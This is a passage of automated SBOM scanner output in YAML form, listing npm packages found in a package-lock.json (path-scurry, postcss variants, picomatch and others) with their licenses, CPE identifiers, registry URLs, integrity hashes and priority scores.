*id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 135178fee69fc7b7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: path-scurry 1.11.1' title: path-scurry 1.11.1 description: 'Package discovered: path-scurry 1.11.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f605927959537dfd name: path-scurry version: 1.11.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BlueOak-1.0.0 spdxExpression: BlueOak-1.0.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:path-scurry:path-scurry:1.11.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path-scurry:path_scurry:1.11.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_scurry:path-scurry:1.11.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_scurry:path_scurry:1.11.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path:path-scurry:1.11.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path:path_scurry:1.11.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/path-scurry@1.11.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz integrity: sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA== dependencies: lru-cache: ^10.2.0 minipass: ^5.0.0 || ^6.0.2 || ^7.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ad5632f7c396e60c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: path-to-regexp 0.1.13' title: path-to-regexp 0.1.13 description: 'Package discovered: path-to-regexp 0.1.13' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e6c60d0f52ae43b7 name: path-to-regexp version: 0.1.13 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:path-to-regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path-to-regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_to_regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_to_regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path-to:path-to-regexp:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path-to:path_to_regexp:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_to:path-to-regexp:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_to:path_to_regexp:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path:path-to-regexp:0.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path:path_to_regexp:0.1.13:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/path-to-regexp@0.1.13 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.13.tgz integrity: sha512-A/AGNMFN3c8bOlvV9RreMdrv7jsmF9XIfDeCd87+I8RNg6s78BhJxMu69NEMHBSJFxKidViTEdruRwEk/WIKqA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c2433fd071fcfad6 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: peberminta 0.9.0' title: peberminta 0.9.0 description: 'Package discovered: peberminta 0.9.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f3acb6a3529e1191 name: peberminta version: 0.9.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:peberminta:peberminta:0.9.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/peberminta@0.9.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/peberminta/-/peberminta-0.9.0.tgz integrity: sha512-XIxfHpEuSJbITd1H3EeQwpcZbTLHc+VVr8ANI9t5sit565tsI4/xK3KWTUFE2e6QiangUkh3B0jihzmGnNrRsQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: bd0577c6ddbc7f17 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: picocolors 1.1.1' title: picocolors 1.1.1 description: 'Package discovered: picocolors 1.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9b208867cdc8b323 name: picocolors version: 1.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:picocolors:picocolors:1.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/picocolors@1.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz integrity: sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2e6faecb84cf8a8b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: picomatch 2.3.2' title: picomatch 2.3.2 description: 'Package discovered: picomatch 2.3.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0c0ba7fcf7a893f6 name: picomatch version: 2.3.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:jonschlinkert:picomatch:2.3.2:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/picomatch@2.3.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz integrity: sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 44e51885407159f3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: picomatch 4.0.4' title: picomatch 4.0.4 description: 'Package discovered: picomatch 4.0.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 09943c54769c1f79 name: picomatch version: 4.0.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:jonschlinkert:picomatch:4.0.4:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/picomatch@4.0.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz integrity: sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b7793733f0a92625 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: pify 2.3.0' title: pify 2.3.0 description: 'Package discovered: pify 2.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 93c54feee38dbf96 name: pify version: 2.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:pify:pify:2.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/pify@2.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/pify/-/pify-2.3.0.tgz integrity: sha512-udgsAY+fTnvv7kI7aaxbqwWNb0AHiB0qBO89PZKPkoTmGOgdbrHDKD+0B2X4uTfJ/FT1R09r9gTsjUjNJotuog== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0b578240afa70fcd ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: pirates 4.0.7' title: pirates 4.0.7 description: 'Package discovered: pirates 4.0.7' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 47481e92080dd044 name: pirates version: 4.0.7 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:pirates:pirates:4.0.7:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/pirates@4.0.7 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/pirates/-/pirates-4.0.7.tgz integrity: sha512-TfySrs/5nm8fQJDcBDuUng3VOUKsd7S+zqvbOTiGXHfxX4wK31ard+hoNuvkicM/2YFzlpDgABOevKSsB4G/FA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 72750f8253cdf631 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: png-js 2.0.0' title: png-js 2.0.0 description: 'Package discovered: png-js 2.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7a0a81fa01919ffb name: png-js version: 2.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:png-js:png-js:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:png-js:png_js:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:png_js:png-js:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:png_js:png_js:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:png:png-js:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:png:png_js:2.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/png-js@2.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/png-js/-/png-js-2.0.0.tgz integrity: sha512-GdzJuUMc6ZSpxFJWVxtOH1bzYHym+TOnveqUjb+VJIbZWbZzyiRGFiKhbiielfpYbgMlhHVhsJ0FTazfuRFkMA== dependencies: fflate: ^0.8.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 017b0d73e37dad2f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: pngjs 5.0.0' title: pngjs 5.0.0 description: 'Package discovered: pngjs 5.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 33a77729322028df name: pngjs version: 5.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:pngjs:pngjs:5.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/pngjs@5.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/pngjs/-/pngjs-5.0.0.tgz integrity: sha512-40QW5YalBNfQo5yRYmiw7Yz6TKKVr3h6970B2YE+3fQpsWcrbj1PzJgxeJ19DRQjhMbKPIuMY8rFaXc8moolVw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6c2c21065eca2894 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: postcss 8.4.31' title: postcss 8.4.31 description: 'Package discovered: postcss 8.4.31' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a519bffcd9b56c6d name: postcss version: 8.4.31 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:postcss:postcss:8.4.31:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/postcss@8.4.31 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/postcss/-/postcss-8.4.31.tgz integrity: sha512-PS08Iboia9mts/2ygV3eLpY5ghnUcfLV/EXTOW1E2qYxJKGGBUtNjN76FYHnMs36RmARn41bC0AZmn+rR0OVpQ== dependencies: nanoid: ^3.3.6 picocolors: ^1.0.0 source-map-js: ^1.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 87700f6dfcbe47e2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: postcss 8.5.12' title: postcss 8.5.12 description: 'Package discovered: postcss 8.5.12' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 588683a1923c27d7 name: postcss version: 8.5.12 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:postcss:postcss:8.5.12:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/postcss@8.5.12 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/postcss/-/postcss-8.5.12.tgz integrity: sha512-W62t/Se6rA0Az3DfCL0AqJwXuKwBeYg6nOaIgzP+xZ7N5BFCI7DYi1qs6ygUYT6rvfi6t9k65UMLJC+PHZpDAA== dependencies: nanoid: ^3.3.11 picocolors: ^1.1.1 source-map-js: ^1.2.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f6953879c586ae44 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: postcss-import 15.1.0' title: postcss-import 15.1.0 description: 'Package discovered: postcss-import 15.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9f2c64d652651310 name: postcss-import version: 15.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:postcss-import:postcss-import:15.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss-import:postcss_import:15.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_import:postcss-import:15.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_import:postcss_import:15.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss:postcss-import:15.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss:postcss_import:15.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/postcss-import@15.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/postcss-import/-/postcss-import-15.1.0.tgz integrity: sha512-hpr+J05B2FVYUAXHeK1YyI267J/dDDhMU6B6civm8hSY1jYJnBXxzKDKDswzJmtLHryrjhnDjqqp/49t8FALew== dependencies: postcss-value-parser: ^4.0.0 read-cache: ^1.0.0 resolve: ^1.1.7 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 49a05cdffa8a7ef9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: postcss-js 4.1.0' title: postcss-js 4.1.0 description: 'Package discovered: postcss-js 4.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9feba814d6f9cb30 name: postcss-js version: 4.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:postcss-js:postcss-js:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss-js:postcss_js:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_js:postcss-js:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_js:postcss_js:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss:postcss-js:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss:postcss_js:4.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/postcss-js@4.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/postcss-js/-/postcss-js-4.1.0.tgz integrity: sha512-oIAOTqgIo7q2EOwbhb8UalYePMvYoIeRY2YKntdpFQXNosSu3vLrniGgmH9OKs/qAkfoj5oB3le/7mINW1LCfw== dependencies: camelcase-css: ^2.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 92ac10dec31ee632 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: postcss-load-config 6.0.1' title: postcss-load-config 6.0.1 description: 'Package discovered: postcss-load-config 6.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 07fb83a013bf4ef4 name: postcss-load-config version: 6.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:postcss-load-config:postcss-load-config:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss-load-config:postcss_load_config:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_load_config:postcss-load-config:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_load_config:postcss_load_config:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss-load:postcss-load-config:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss-load:postcss_load_config:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_load:postcss-load-config:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_load:postcss_load_config:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss:postcss-load-config:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss:postcss_load_config:6.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/postcss-load-config@6.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/postcss-load-config/-/postcss-load-config-6.0.1.tgz integrity: sha512-oPtTM4oerL+UXmx+93ytZVN82RrlY/wPUV8IeDxFrzIjXOLF1pN+EmKPLbubvKHT2HC20xXsCAH2Z+CKV6Oz/g== dependencies: lilconfig: ^3.1.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a302d705f049e265 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: postcss-nested 6.2.0' title: postcss-nested 6.2.0 description: 'Package discovered: postcss-nested 6.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 16f11e75cb882477 name: postcss-nested version: 6.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:postcss-nested:postcss-nested:6.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss-nested:postcss_nested:6.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_nested:postcss-nested:6.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_nested:postcss_nested:6.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss:postcss-nested:6.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss:postcss_nested:6.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/postcss-nested@6.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/postcss-nested/-/postcss-nested-6.2.0.tgz integrity: sha512-HQbt28KulC5AJzG+cZtj9kvKB93CFCdLvog1WFLf1D+xmMvPGlBstkpTEZfK5+AN9hfJocyBFCNiqyS48bpgzQ== dependencies: postcss-selector-parser: ^6.1.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 002cf57b0b0dcab6 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: postcss-selector-parser 6.1.2' title: postcss-selector-parser 6.1.2 description: 'Package discovered: postcss-selector-parser 6.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f7f4c134629f3b3a name: postcss-selector-parser version: 6.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:postcss-selector-parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss-selector-parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_selector_parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_selector_parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss-selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss-selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss:postcss-selector-parser:6.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss:postcss_selector_parser:6.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/postcss-selector-parser@6.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: 